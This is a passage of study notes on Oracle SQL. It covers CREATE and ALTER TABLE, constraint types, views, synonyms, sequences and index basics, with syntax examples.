<div class="sourceCode" id="cb18"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb18-1"><a aria-hidden="true" href="#cb18-1" tabindex="-1"></a><span class="kw">CREATE</span> <span class="kw">TABLE</span> [<span class="kw">schema</span>.]<span class="kw">table</span> [<span class="kw">ORGANIZATION</span> <span class="kw">HEAP</span>] <span class="op">-></span> <span class="kw">default</span> <span class="kw">and</span> <span class="kw">is</span> industry standard SQL.</span>
<span id="cb18-2"><a aria-hidden="true" href="#cb18-2" tabindex="-1"></a>(<span class="kw">column</span> datatype [<span class="kw">DEFAULT</span> expression]</span>
<span id="cb18-3"><a aria-hidden="true" href="#cb18-3" tabindex="-1"></a>[,<span class="kw">column</span> datatype [<span class="kw">DEFAULT</span> expression]<span class="op">..</span>.);</span></code></pre></div>
<ol start="4" type="1">
<li>The DEFAULT clause can be useful, but it is of limited
functionality. You cannot use a subquery to generate the default value:
you can only specify literal values or functions.</li>
<li>CREATE TABLE [schema.]table AS subquery; -> create table
employees_copy as select * from employees; .. Create a table
EMPLOYEES_COPY, which is an exact copy of the EMPLOYEES table, identical
in both definition and the rows it contains. .. Any not null and check
constraints on the columns will also be applied to the new table, but
any primary-key, unique, or foreign-key constraints will not be</li>
<li>All of these changes are DDL commands with the built-in COMMIT.
Altering Table Definitions after Creation</li>
</ol>
<div class="sourceCode" id="cb19"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb19-1"><a aria-hidden="true" href="#cb19-1" tabindex="-1"></a><span class="kw">alter</span> <span class="kw">table</span> emp <span class="kw">add</span> (job_id <span class="dt">number</span>); <span class="op">-></span> Adding a <span class="kw">column</span></span>
<span id="cb19-2"><a aria-hidden="true" href="#cb19-2" tabindex="-1"></a><span class="kw">alter</span> <span class="kw">table</span> emp <span class="kw">modify</span> (comm <span class="dt">number</span>(<span class="dv">4</span>,<span class="dv">2</span>) <span class="kw">default</span> <span class="fl">0.05</span>); <span class="op">-></span> modifying a <span class="kw">column</span></span>
<span id="cb19-3"><a aria-hidden="true" href="#cb19-3" tabindex="-1"></a><span class="kw">alter</span> <span class="kw">table</span> emp <span class="kw">drop</span> <span class="kw">column</span> comm; <span class="op">-></span> dropping a <span class="kw">column</span></span>
<span id="cb19-4"><a aria-hidden="true" href="#cb19-4" tabindex="-1"></a><span class="kw">alter</span> <span class="kw">table</span> emp <span class="kw">set</span> <span class="kw">unused</span> <span class="kw">column</span> job_id; <span class="op">-></span> Marking <span class="kw">column</span> <span class="kw">as</span> <span class="kw">unused</span></span>
<span id="cb19-5"><a aria-hidden="true" href="#cb19-5" tabindex="-1"></a><span class="kw">alter</span> <span class="kw">table</span> emp <span class="kw">rename</span> <span class="kw">column</span> hiredate <span class="kw">to</span> recruited; <span class="op">-></span> Renaming <span class="kw">the</span> <span class="kw">column</span></span>
<span id="cb19-6"><a aria-hidden="true" href="#cb19-6" tabindex="-1"></a><span class="kw">alter</span> <span class="kw">table</span> emp <span class="kw">read</span> <span class="kw">only</span>; <span class="op">-></span> marking <span class="kw">table</span> <span class="kw">as</span> <span class="kw">read</span><span class="op">-</span><span class="kw">only</span></span></code></pre></div>
<ol start="6" type="1">
<li>Dropping a column can be a time-consuming exercise because as each
column is dropped, every row must be restructured to remove the column’s
data.</li>
<li>The SET UNUSED command, which makes columns nonexistent as far as
SQL is concerned, is often a better alternative, followed when
convenient by <code>ALTER TABLE tablename DROP UNUSED COLUMNS;</code>
which will drop all the unused columns in one pass through the
table.</li>
<li>Marking a table as read-only will cause errors for any attempted DML
commands. But the table can still be dropped.</li>
<li>DROP TABLE [schema.]tablename ; -> it includes a COMMIT. .. If
any session (even your own) has a transaction in progress that includes
a row in the table, then the DROP will fail, .. It is also impossible to
drop a table that is referred to in a foreign key constraint defined for
a another table. This table (or the constraint) must be dropped
first.</li>
<li>The constraint types</li>
</ol>
<div class="sourceCode" id="cb20"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb20-1"><a aria-hidden="true" href="#cb20-1" tabindex="-1"></a><span class="kw">UNIQUE</span></span>
<span id="cb20-2"><a aria-hidden="true" href="#cb20-2" tabindex="-1"></a><span class="kw">NOT</span> <span class="kw">NULL</span></span>
<span id="cb20-3"><a aria-hidden="true" href="#cb20-3" tabindex="-1"></a><span class="kw">PRIMARY</span> <span class="kw">KEY</span></span>
<span id="cb20-4"><a aria-hidden="true" href="#cb20-4" tabindex="-1"></a><span class="kw">FOREIGN</span> <span class="kw">KEY</span></span>
<span id="cb20-5"><a aria-hidden="true" href="#cb20-5" tabindex="-1"></a><span class="kw">CHECK</span></span></code></pre></div>
<p><em>If name is not provided, Oracle generates the constraint
names</em></p>
<ol start="11" type="1">
<li>An oddity of unique constraints is that it is possible to enter a
NULL value into the key column(s); it is indeed possible to have any
number of rows with NULL values in their key column(s)</li>
<li>Unique constraints are enforced by an index. When a unique
constraint is defined, Oracle will look for an index on the key
column(s), and if one does not exist it will be created.</li>
<li>The structure of these indexes (known as B*Tree indexes) does not
include NULL values, which is why many rows with NULL are permitted:
they simply do not exist in the index.</li>
<li>selecting WHERE key_column IS NULL cannot use the index because it
doesn’t include the NULLs and will therefore always result in a scan of
the entire table.</li>
<li>CANNOT define one not null constraint for the whole group, but
instead must define a not null constraint for each column.</li>
<li>Possible to bypass the need to specify a value by including a
DEFAULT clause on the column when creating the table</li>
<li>The relational database paradigm includes a requirement that every
table should have a primary key, a column (or combination of columns)
that can be used to distinguish every row. .. The Oracle database
deviates from the paradigm (as do some other RDBMS implementations) by
permitting tables without primary keys</li>
<li>A table can have only one primary key. Try to create a second, and
you will get an error. A table can, however, have any number of unique
constraints and not null columns,</li>
<li>A primary key constraint is a unique constraint combined with a not
null constraint.</li>
<li>Foreign Key Constraints - The columns do not have to have the same
names, but they must be of the same data type.</li>
<li>Attempting to inset a row in the child table for which there is no
matching row in the parent table will give an error. .. Similarly,
deleting a row in the parent table will give an error if there are
already rows referring to it in the child table</li>
<li>The constraint may be created as ON DELETE CASCADE. .. This means
that if a row in the parent table is deleted, Oracle will search the
child table for all the matching rows and delete them too.</li>
<li>ON DELETE SET NULL. .. If a row in the parent table is deleted,
Oracle will search the child table for all the matching rows and set the
foreign key columns to null. .. This means that the child rows will be
orphaned, but will still exist. .. If the columns in the child table
also have a not null constraint, then the deletion from the parent table
will fail.</li>
<li>It is not possible to drop or truncate the parent table in a foreign
key relationship, even if there are no rows in the child table. .. This
still applies if the ON DELETE SET NULL or ON DELETE CASCADE clauses
were used.</li>
<li>Check Constraints -> The rule must be an expression which will
evaluate to TRUE or FALSE .. The rules can refer to absolute values
entered as literals or to other columns in the same row and may make use
of some functions. .. As many check constraints as you want can be
applied to one column, but it is not possible to use a subquery to
evaluate whether a value is permissible or to use functions such as
SYSDATE. .. The not null constraint is in fact implemented as a
preconfigured check constraint.</li>
<li>If you really need to make the change in a hurry, ask the database
administrator to quiesce the database: this is a process that will
freeze all user sessions. ..If you are very quick, you can make the
change then unquiesce the database before end users complain.</li>
<li>Example</li>
</ol>
<div class="sourceCode" id="cb21"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb21-1"><a aria-hidden="true" href="#cb21-1" tabindex="-1"></a><span class="kw">create</span> <span class="kw">table</span> dept(</span>
<span id="cb21-2"><a aria-hidden="true" href="#cb21-2" tabindex="-1"></a>deptno <span class="dt">number</span>(<span class="dv">2</span>,<span class="dv">0</span>) <span class="kw">constraint</span> dept_deptno_pk <span class="kw">primary</span> <span class="kw">key</span> <span class="op">-></span> <span class="kw">CONSTRAINT</span> CONSTRAINT_NAME <span class="kw">PRIMARY</span> <span class="kw">KEY</span></span>
<span id="cb21-3"><a aria-hidden="true" href="#cb21-3" tabindex="-1"></a><span class="kw">constraint</span> dept_deptno_ck <span class="kw">check</span> (deptno <span class="kw">between</span> <span class="dv">10</span> <span class="kw">and</span> <span class="dv">90</span>), <span class="op">-></span> <span class="kw">CONSTRAINT</span> CONSTRAINT_NAME <span class="kw">CHECK</span> (COLUMN_NAME <span class="kw">BETWEEN</span> <span class="dv">10</span> <span class="kw">AND</span> <span class="dv">90</span>)</span>
<span id="cb21-4"><a aria-hidden="true" href="#cb21-4" tabindex="-1"></a>dname <span class="dt">varchar2</span>(<span class="dv">20</span>) <span class="kw">constraint</span> dept_dname_nn <span class="kw">not</span> <span class="kw">null</span>); <span class="op">-></span> <span class="kw">CONSTRAINT</span> CONSTRAINT_NAME <span class="kw">NOT</span> <span class="kw">NULL</span></span>
<span id="cb21-5"><a aria-hidden="true" href="#cb21-5" tabindex="-1"></a></span>
<span id="cb21-6"><a aria-hidden="true" href="#cb21-6" tabindex="-1"></a></span>
<span id="cb21-7"><a aria-hidden="true" href="#cb21-7" tabindex="-1"></a><span class="kw">create</span> <span class="kw">table</span> emp(</span>
<span id="cb21-8"><a aria-hidden="true" href="#cb21-8" tabindex="-1"></a>empno <span class="dt">number</span>(<span class="dv">4</span>,<span class="dv">0</span>) <span class="kw">constraint</span> emp_empno_pk <span class="kw">primary</span> <span class="kw">key</span>,</span>
<span id="cb21-9"><a aria-hidden="true" href="#cb21-9" tabindex="-1"></a>ename <span class="dt">varchar2</span>(<span class="dv">20</span>) <span class="kw">constraint</span> emp_ename_nn <span class="kw">not</span> <span class="kw">null</span>,</span>
<span id="cb21-10"><a aria-hidden="true" href="#cb21-10" tabindex="-1"></a>mgr <span class="dt">number</span> (<span class="dv">4</span>,<span class="dv">0</span>) <span class="kw">constraint</span> emp_mgr_fk <span class="kw">references</span> emp (empno), <span class="op">-></span> <span class="kw">CONSTRAINT</span> CONSTRAINT_NAME <span class="kw">REFERENCES</span> TABLE_NAME (COLUMN_NAME)</span>
<span id="cb21-11"><a aria-hidden="true" href="#cb21-11" tabindex="-1"></a>dob <span class="dt">date</span>,</span>
<span id="cb21-12"><a aria-hidden="true" href="#cb21-12" tabindex="-1"></a>hiredate <span class="dt">date</span>,</span>
<span id="cb21-13"><a aria-hidden="true" href="#cb21-13" tabindex="-1"></a>deptno <span class="dt">number</span>(<span class="dv">2</span>,<span class="dv">0</span>) <span class="kw">constraint</span> emp_deptno_fk <span class="kw">references</span> dept(deptno)</span>
<span id="cb21-14"><a aria-hidden="true" href="#cb21-14" tabindex="-1"></a><span class="kw">on</span> <span class="kw">delete</span> <span class="kw">set</span> <span class="kw">null</span>,</span>
<span id="cb21-15"><a aria-hidden="true" href="#cb21-15" tabindex="-1"></a>email <span class="dt">varchar2</span>(<span class="dv">30</span>) <span class="kw">constraint</span> emp_email_uk <span class="kw">unique</span>, <span class="op">-></span> <span class="kw">CONSTRAINT</span> CONSTRAINT_NAME <span class="kw">UNIQUE</span></span>
<span id="cb21-16"><a aria-hidden="true" href="#cb21-16" tabindex="-1"></a></span>
<span id="cb21-17"><a aria-hidden="true" href="#cb21-17" tabindex="-1"></a><span class="co">/* ADDING ADDITIONAL CONSTRAINTS AT THE </span><span class="re">END</span><span class="co"> */</span></span>
<span id="cb21-18"><a aria-hidden="true" href="#cb21-18" tabindex="-1"></a></span>
<span id="cb21-19"><a aria-hidden="true" href="#cb21-19" tabindex="-1"></a><span class="kw">constraint</span> emp_hiredate_ck <span class="kw">check</span> (hiredate <span class="op">>=</span> dob <span class="op">+</span> <span class="dv">365</span><span class="op">*</span><span class="dv">16</span>),</span>
<span id="cb21-20"><a aria-hidden="true" href="#cb21-20" tabindex="-1"></a><span class="kw">constraint</span> emp_email_ck</span>
<span id="cb21-21"><a aria-hidden="true" href="#cb21-21" tabindex="-1"></a><span class="kw">check</span> ((<span class="fu">instr</span>(email,<span class="st">'@'</span>) <span class="op">></span> <span class="dv">0</span>) <span class="kw">and</span> (<span class="fu">instr</span>(email,<span class="st">'.'</span>) <span class="op">></span> <span class="dv">0</span>)));</span></code></pre></div>
<ol start="28" type="1">
<li>Stored procedures, synonyms, tables, and views exist in the same
namespace.</li>
<li>A heap is a table of variable length rows in random order. a heap
table can only be one table.a heap table can (and usually will) have
indexes and a primary key.</li>
<li>BLOB, LONG, NUMBER, RAW and VARCHAR2 are variable length. CHAR is
fixed length</li>
<li>CHAR, FLOAT, and INTEGER are all internal data types, though not as
widely used as some others.</li>
<li><code>create table newtab as select * from tab;</code> .. Check and
not null constraints are not dependent on any structures other than the
table to which they apply and so can safely be copied to a new table. ..
Primary key and unique constraints WILL NOT be copied as they are
dependent on other structures</li>
<li>Unique and primary key constraints are enforced with indexes. ..
Check and not null constraints do not rely on indexes.</li>
<li>Constraint violation will force a roll back of the current statement
but nothing else even if the transaction consists of more than one
statement</li>
</ol>
<h3 id="chapter-12">Chapter 12</h3>
<ol type="1">
<li>A View looks like a table: a two-dimensional structure of rows of
columns, against which the user can run SELECT and DML statements.</li>
<li>It can join tables, perform aggregations, or do sorts; absolutely
anything that is legal in the SELECT command can be used. However, if
the view is complex, then only SELECT statements can be run against
it</li>
<li>Views share the same namespace as tables. But DML operations will
not always succeed.</li>
<li>Use of Views: .. Security. .. Simplifying user SQL. .. Preventing
error. .. Making data comprehensible. Table and column names are often
long and pretty meaningless. .. The view and its columns can be much
more obvious. .. Performance.</li>
<li>A nested loop join uses an index to get to individual rows; a hash
join reads the whole table into memory.</li>
<li>Create View syntax</li>
</ol>
<div class="sourceCode" id="cb22"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb22-1"><a aria-hidden="true" href="#cb22-1" tabindex="-1"></a><span class="kw">create</span> <span class="kw">view</span> dept_emp <span class="kw">as</span></span>
<span id="cb22-2"><a aria-hidden="true" href="#cb22-2" tabindex="-1"></a><span class="kw">select</span> <span class="co">/*+USE_HASH (employees departments)*/</span> department_name, last_name</span>
<span id="cb22-3"><a aria-hidden="true" href="#cb22-3" tabindex="-1"></a><span class="kw">from</span> departments <span class="kw">natural</span> <span class="kw">join</span> employees;</span></code></pre></div>
<ol start="7" type="1">
<li>A simple view draws data from one detail table, uses no functions,
and does no aggregation. -> DML statements work .. A complex view can
join detail tables, use functions, and perform aggregations. -> DML
Statements wont work</li>
<li>If the view does not include a column that has a NOT NULL
constraint, then an INSERT through the view cannot succeed (unless the
column has a default value). .. This can produce a disconcerting effect
because the error message will refer to a table and a column that are
not mentioned in the statement</li>
<li>Full syntax with options</li>
</ol>
<div class="sourceCode" id="cb23"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb23-1"><a aria-hidden="true" href="#cb23-1" tabindex="-1"></a><span class="kw">CREATE</span> [<span class="kw">OR</span> <span class="kw">REPLACE</span>] [<span class="kw">FORCE</span> | <span class="kw">NOFORCE</span>] <span class="kw">VIEW</span></span>
<span id="cb23-2"><a aria-hidden="true" href="#cb23-2" tabindex="-1"></a> [<span class="kw">schema</span>.]viewname [(alias [,alias]…)]</span>
<span id="cb23-3"><a aria-hidden="true" href="#cb23-3" tabindex="-1"></a> <span class="kw">AS</span> subquery</span>
<span id="cb23-4"><a aria-hidden="true" href="#cb23-4" tabindex="-1"></a> [<span class="kw">WITH</span> <span class="kw">CHECK</span> <span class="kw">OPTION</span> [<span class="kw">CONSTRAINT</span> constraintname]]</span>
<span id="cb23-5"><a aria-hidden="true" href="#cb23-5" tabindex="-1"></a> [<span class="kw">WITH</span> <span class="kw">READ</span> <span class="kw">ONLY</span> [<span class="kw">CONSTRAINT</span> constraintname]] ;</span>
<span id="cb23-6"><a aria-hidden="true" href="#cb23-6" tabindex="-1"></a> <span class="kw">REPLACE</span> <span class="op">-></span> replacing <span class="kw">the</span> <span class="kw">view</span></span>
<span id="cb23-7"><a aria-hidden="true" href="#cb23-7" tabindex="-1"></a> FORCR <span class="kw">or</span> <span class="kw">NOFORCE</span> <span class="op">-></span></span>
<span id="cb23-8"><a aria-hidden="true" href="#cb23-8" tabindex="-1"></a> <span class="kw">The</span> <span class="kw">FORCE</span> keyword will <span class="kw">create</span> <span class="kw">the</span> <span class="kw">view</span> even <span class="cf">if</span> <span class="kw">the</span> detail <span class="kw">table</span>(s) <span class="kw">in</span> <span class="kw">the</span> subquery does <span class="kw">not</span> exist.</span>
<span id="cb23-9"><a aria-hidden="true" href="#cb23-9" tabindex="-1"></a> <span class="kw">NOFORCE</span> <span class="kw">is</span> <span class="kw">the</span> <span class="kw">default</span> <span class="kw">and</span> will cause an error <span class="cf">if</span> <span class="kw">the</span> detail <span class="kw">table</span> does <span class="kw">not</span> exist.</span>
<span id="cb23-10"><a aria-hidden="true" href="#cb23-10" tabindex="-1"></a> <span class="kw">WITH</span> <span class="kw">CHECK</span> <span class="kw">OPTION</span></span>
<span id="cb23-11"><a aria-hidden="true" href="#cb23-11" tabindex="-1"></a> <span class="cf">If</span> <span class="kw">the</span> subquery includes a <span class="kw">WHERE</span> clause, <span class="cf">then</span> this <span class="kw">option</span> will prevent insertion <span class="kw">of</span> <span class="kw">rows</span></span>
<span id="cb23-12"><a aria-hidden="true" href="#cb23-12" tabindex="-1"></a> that wouldn’t be seen <span class="kw">in</span> <span class="kw">the</span> <span class="kw">view</span> <span class="kw">or</span> updates that would cause a <span class="kw">row</span> <span class="kw">to</span> disappear <span class="kw">from</span> <span class="kw">the</span> <span class="kw">view</span>.</span>
<span id="cb23-13"><a aria-hidden="true" href="#cb23-13" tabindex="-1"></a> <span class="kw">By</span> <span class="kw">default</span>, this <span class="kw">option</span> <span class="kw">is</span> <span class="kw">not</span> enabled, which can give disconcerting results.</span>
<span id="cb23-14"><a aria-hidden="true" href="#cb23-14" tabindex="-1"></a> <span class="kw">WITH</span> <span class="kw">READ</span> <span class="kw">ONLY</span></span>
<span id="cb23-15"><a aria-hidden="true" href="#cb23-15" tabindex="-1"></a></span>
<span id="cb23-16"><a aria-hidden="true" href="#cb23-16" tabindex="-1"></a> <span class="kw">CONSTRAINT</span> constraintname</span>
<span id="cb23-17"><a aria-hidden="true" href="#cb23-17" tabindex="-1"></a> name <span class="kw">the</span> <span class="kw">WITH</span> <span class="kw">CHECK</span> <span class="kw">OPTION</span> <span class="kw">and</span> <span class="kw">WITH</span> <span class="kw">READ</span> <span class="kw">ONLY</span> restrictions <span class="cf">for</span> better error messages</span></code></pre></div>
<ol start="10" type="1">
<li><p>The main use of the ALTER VIEW command is to compile the view. A
view must be compiled successfully before it can be used .. When a view
is created, Oracle will check that the detail tables and the necessary
columns on which the view is based do exist. .. If they do not, the
compilation fails and the view will not be created, unless you use the
FORCE option. .. In that case, the view will be created but will be
unusable until the tables or columns to which it refers are created and
the view is successfully compiled. .. When an invalid view is queried,
Oracle will attempt to compile it automatically. .. If the compilation
succeeds because the problem has been fixed, the user won’t know there
was ever a problem</p>
<p><code>ALTER VIEW HR.ex_staff compile;</code></p></li>
<li><p><code>DROP VIEW [schema.]viewname ;</code></p></li>
<li><p>A synonym is an alternative name for an object. .. Use of
synonyms means that an application can function for any user,
irrespective of which schema owns the views and tables or even in which
database the tables reside.</p></li>
<li><p><code>select * from hr.employees@prod;</code> .. database link
PROD (means of accessing objects in a database other than that onto
which you are logged)</p></li>
<li><p>Public Synonym: -> data independence and location transparency
<code>create public synonym emp for hr.employees@prod;</code> .. All the
user (any user!) need enter is the following:
<code>select * from emp;</code></p></li>
<li><p>As well as SELECT statements, DML statements can address synonyms
as though they were the object to which they refer.</p></li>
<li><p>Private synonyms are schema objects. Either they must be in your
own schema, or they must be qualified with the schema name.</p></li>
<li><p>Public synonyms exist independently of a schema. .. A public
synonym can be referred to by any user to whom permission has been
granted to see it without the need to qualify it with a schema name. ..
Private synonyms must be a unique name within their schema. .. Public
synonyms can have the same name as schema objects. .. When executing
statements that address objects without a schema qualifier, Oracle will
first look for the object in the local schema, and only if it cannot be
found will it look for a public synonym.</p></li>
<li><p><code>CREATE [PUBLIC] SYNONYM synonym FOR object ;</code></p></li>
<li><p>The “public” in “public synonym” means that it is not a schema
object and cannot therefore be prefixed with a schema name. It does not
mean that everyone has permissions against it.</p></li>
<li><p>A user will need to have been granted permission to create
private synonyms and further permission to create public synonyms. ..
Usually, only the database administrator can create (or drop) public
synonyms</p></li>
<li><p><code>DROP [PUBLIC] SYNONYM synonym ;</code></p></li>
<li><p>If the object to which a synonym refers (the table or view) is
dropped, the synonym continues to exist. .. Any attempt to use it will
return an error. In this respect, synonyms behave in the same way as
views. .. If the object is recreated, the synonym must be recompiled
before use</p>
<p><code>ALTER SYNONYM synonym COMPILE;</code></p></li>
<li><p>SEQUENCE .. A sequence is a structure for generating unique
integer values. Only one session can read the next value and thus force
it to increment.</p></li>
<li><p>Each selection of SEQ1.NEXTVAL generates a unique
number.</p></li>
<li><p>Sequence Create Syntax</p></li>
</ol>
<div class="sourceCode" id="cb24"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb24-1"><a aria-hidden="true" href="#cb24-1" tabindex="-1"></a><span class="kw">CREATE</span> <span class="kw">SEQUENCE</span> [<span class="kw">schema</span>.]sequencename</span>
<span id="cb24-2"><a aria-hidden="true" href="#cb24-2" tabindex="-1"></a> [<span class="kw">INCREMENT</span> <span class="kw">BY</span> <span class="dt">number</span>] <span class="op">-></span> Defaults <span class="kw">to</span> <span class="op">+</span><span class="dv">1</span> but can be <span class="kw">any</span> positive <span class="dt">number</span> (<span class="kw">or</span> negative <span class="dt">number</span> <span class="cf">for</span> a descending <span class="kw">sequence</span>).</span>
<span id="cb24-3"><a aria-hidden="true" href="#cb24-3" tabindex="-1"></a> [<span class="kw">START</span> <span class="kw">WITH</span> <span class="dt">number</span>] <span class="op">-></span> Defaults <span class="kw">to</span> <span class="dv">1</span> but can be anything.</span>
<span id="cb24-4"><a aria-hidden="true" href="#cb24-4" tabindex="-1"></a> [<span class="kw">MAXVALUE</span> <span class="dt">number</span> | <span class="kw">NOMAXVALUE</span>]</span>
<span id="cb24-5"><a aria-hidden="true" href="#cb24-5" tabindex="-1"></a> <span class="op">-></span> <span class="kw">The</span> highest <span class="dt">number</span> an ascending <span class="kw">sequence</span> can go <span class="kw">to</span> <span class="kw">before</span> generating an error <span class="kw">or</span> <span class="kw">returning</span> <span class="kw">to</span> its <span class="kw">START</span> <span class="kw">WITH</span> <span class="fu">value</span>.</span>
<span id="cb24-6"><a aria-hidden="true" href="#cb24-6" tabindex="-1"></a> <span class="kw">The</span> <span class="kw">default</span> <span class="kw">is</span> <span class="kw">no</span> maximum.</span>
<span id="cb24-7"><a aria-hidden="true" href="#cb24-7" tabindex="-1"></a> [<span class="kw">MINVALUE</span> <span class="dt">number</span> | <span class="kw">NOMINVALUE</span>]</span>
<span id="cb24-8"><a aria-hidden="true" href="#cb24-8" tabindex="-1"></a> <span class="op">-></span> <span class="kw">The</span> lowest <span class="dt">number</span> a descending <span class="kw">sequence</span> can go <span class="kw">to</span> <span class="kw">before</span> generating an error <span class="kw">or</span> <span class="kw">returning</span> <span class="kw">to</span> its <span class="kw">START</span> <span class="kw">WITH</span> <span class="fu">value</span>.</span>
<span id="cb24-9"><a aria-hidden="true" href="#cb24-9" tabindex="-1"></a> <span class="kw">The</span> <span class="kw">default</span> <span class="kw">is</span> <span class="kw">no</span> <span class="kw">minimum</span>.</span>
<span id="cb24-10"><a aria-hidden="true" href="#cb24-10" tabindex="-1"></a> [<span class="kw">CYCLE</span> | <span class="kw">NOCYCLE</span>]</span>
<span id="cb24-11"><a aria-hidden="true" href="#cb24-11" tabindex="-1"></a> <span class="op">-></span> Controls <span class="kw">the</span> behavior <span class="kw">on</span> reaching <span class="kw">MAXVALUE</span> <span class="kw">or</span> <span class="kw">MINVALUE</span>. <span class="kw">The</span> <span class="kw">default</span> behavior <span class="kw">is</span> <span class="kw">to</span> give an error</span>
<span id="cb24-12"><a aria-hidden="true" href="#cb24-12" tabindex="-1"></a> <span class="cf">If</span> <span class="kw">CYCLE</span> <span class="kw">is</span> specified <span class="kw">the</span> <span class="kw">sequence</span> will <span class="kw">return</span> <span class="kw">to</span> its starting point <span class="kw">and</span> repeat.</span>
<span id="cb24-13"><a aria-hidden="true" href="#cb24-13" tabindex="-1"></a> [<span class="kw">CACHE</span> <span class="dt">number</span> | <span class="kw">NOCACHE</span>]</span>
<span id="cb24-14"><a aria-hidden="true" href="#cb24-14" tabindex="-1"></a> <span class="op">-></span> Oracle can preissue <span class="kw">sequence</span> <span class="kw">values</span> <span class="kw">in</span> batches <span class="kw">and</span> <span class="kw">cache</span> them <span class="cf">for</span> issuing <span class="kw">to</span> users.</span>
<span id="cb24-15"><a aria-hidden="true" href="#cb24-15" tabindex="-1"></a> <span class="kw">The</span> <span class="kw">default</span> <span class="kw">is</span> <span class="kw">to</span> generate <span class="kw">and</span> <span class="kw">cache</span> <span class="kw">the</span> <span class="kw">next</span> <span class="dv">20</span> <span class="kw">values</span>.</span>
<span id="cb24-16"><a aria-hidden="true" href="#cb24-16" tabindex="-1"></a> [<span class="kw">ORDER</span> | <span class="kw">NOORDER</span>] ;</span>
<span id="cb24-17"><a aria-hidden="true" href="#cb24-17" tabindex="-1"></a> <span class="op">-></span> <span class="kw">Only</span> relevant <span class="cf">for</span> a clustered <span class="kw">database</span>:</span>
<span id="cb24-18"><a aria-hidden="true" href="#cb24-18" tabindex="-1"></a> <span class="kw">ORDER</span> forces <span class="kw">all</span> <span class="kw">instances</span> <span class="kw">in</span> <span class="kw">the</span> <span class="kw">cluster</span> <span class="kw">to</span> coordinate incrementing <span class="kw">the</span> <span class="kw">sequence</span>,</span>
<span id="cb24-19"><a aria-hidden="true" href="#cb24-19" tabindex="-1"></a> so that numbers issued are always <span class="kw">in</span> <span class="kw">order</span> even <span class="cf">when</span> issued <span class="kw">to</span> sessions against different <span class="kw">instances</span>.</span>
<span id="cb24-20"><a aria-hidden="true" href="#cb24-20" tabindex="-1"></a> <span class="kw">NOORDER</span> <span class="kw">is</span> <span class="kw">the</span> <span class="kw">default</span></span></code></pre></div>
<ol start="26" type="1">
<li>If your application selects from the sequence 10 times a second,
then set the cache value to 50 thousand.</li>
<li>NEXTVAL -> forces the sequence to increment,</li>
<li>CURRVAL -> the last (or “current”) value issued to that session
with the CURRVAL pseudo column</li>
<li>The CURRVAL will be constant for one session until it selects
NEXTVAL again.</li>
<li>You can always obtain the next value by incrementing it with
NEXTVAL, and you can always recall the last value issued to YOUR session
with CURRVAL, but you CANNOT find the last value issued.</li>
<li>The CURRVAL of a sequence is the last value issued to the current
session, not necessarily the last value issued. .. You cannot select the
CURRVAL until after selecting the NEXTVAL.</li>
<li>A COMMIT is not necessary to make the increment of a sequence
permanent: .. It is permanent and made visible to the rest of the world
the moment it happens. .. Even if the insert or update is rolled back,
the sequence is NOT ROLLEDBACK</li>
<li>The gaps will be larger if the database has been restarted and the
CACHE clause was used. .. All numbers that have been generated and
cached but not yet issued will be lost when the database is shut down ..
At the next restart, the current value of the sequence will be the last
number generated, not the last issued.</li>
<li>Altering a sequence</li>
</ol>
<div class="sourceCode" id="cb25"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb25-1"><a aria-hidden="true" href="#cb25-1" tabindex="-1"></a><span class="kw">ALTER</span> <span class="kw">SEQUENCE</span> sequencename</span>
<span id="cb25-2"><a aria-hidden="true" href="#cb25-2" tabindex="-1"></a>[<span class="kw">INCREMENT</span> <span class="kw">BY</span> <span class="dt">number</span>]</span>
<span id="cb25-3"><a aria-hidden="true" href="#cb25-3" tabindex="-1"></a>[<span class="kw">START</span> <span class="kw">WITH</span> <span class="dt">number</span>]</span>
<span id="cb25-4"><a aria-hidden="true" href="#cb25-4" tabindex="-1"></a>[<span class="kw">MAXVALUE</span> <span class="dt">number</span> | <span class="kw">NOMAXVALUE</span>]</span>
<span id="cb25-5"><a aria-hidden="true" href="#cb25-5" tabindex="-1"></a>[<span class="kw">MINVALUE</span> <span class="dt">number</span> | <span class="kw">NOMINVALUE</span>]</span>
<span id="cb25-6"><a aria-hidden="true" href="#cb25-6" tabindex="-1"></a>[<span class="kw">CYCLE</span> | <span class="kw">NOCYCLE</span>]</span>
<span id="cb25-7"><a aria-hidden="true" href="#cb25-7" tabindex="-1"></a>[<span class="kw">CACHE</span> <span class="dt">number</span> | <span class="kw">NOCACHE</span>]</span>
<span id="cb25-8"><a aria-hidden="true" href="#cb25-8" tabindex="-1"></a>[<span class="kw">ORDER</span> | <span class="kw">NOORDER</span>] ;</span></code></pre></div>
<ol start="35" type="1">
<li><p>ALTER command is the same as the CREATE command, with one
exception: there is no way to set the starting value. .. If you want to
restart the sequence, the only way is to drop it and re-create
it.</p></li>
<li><p>A unique constraint also requires an index. The difference from a
primary key constraint is that the column(s) of the unique constraint
can be left null, perhaps in many rows. .. This does not affect the
creation and use of the index: nulls do not go into the B*Tree
indexes</p></li>
<li><p>Foreign key constraints are enforced by indexes, but the index
must exist on the parent table</p></li>
<li><p>You should always create indexes on the foreign key columns
within the child table for performance reasons: a DELETE on the parent
table will be much faster if Oracle can use an index to determine
whether there are any rows in the child table referencing the row that
is being deleted</p></li>
<li><p>If there is no index on the column(s) referenced in the WHERE
clause, the only way to do this is with a full table scan.</p></li>
<li><p>A SELECT statement that includes the ORDER BY, GROUP BY, or UNION
keywords (and a few others) must sort the rows into order - unless there
is an index, which can return the rows in the correct order without
needing to sort them first.</p></li>
<li><p>Use of Indexes</p>
<p>-> For Primary keys and Foreign keys -> For Sorting during the
usage of ORDER BY or GROUP BY or UNION -> When tables are
joined</p></li>
<li><p>Table Joins -> depending on the size of the tables and the
memory resources available, it may be quicker to scan tables into memory
and join them there, rather than use indexes -> decision by
Oracle</p></li>
<li><p>The nested loop join technique passes through one table using an
index on the other table to locate the matching rows: this is usually a
disk-intensive operation .. A hash join technique reads the entire table
into memory, converts it into a hash table, and uses a hashing algorithm
to locate matching rows; this is more memory and CPU intensive .. A sort
merge join sorts the tables on the join column then merges them
together: this is often a compromise between disk, memory, and CPU
resources</p></li>
<li><p>Types of indexes -> B*Tree index, which is the default index
type, and the Bitmap Index</p></li>
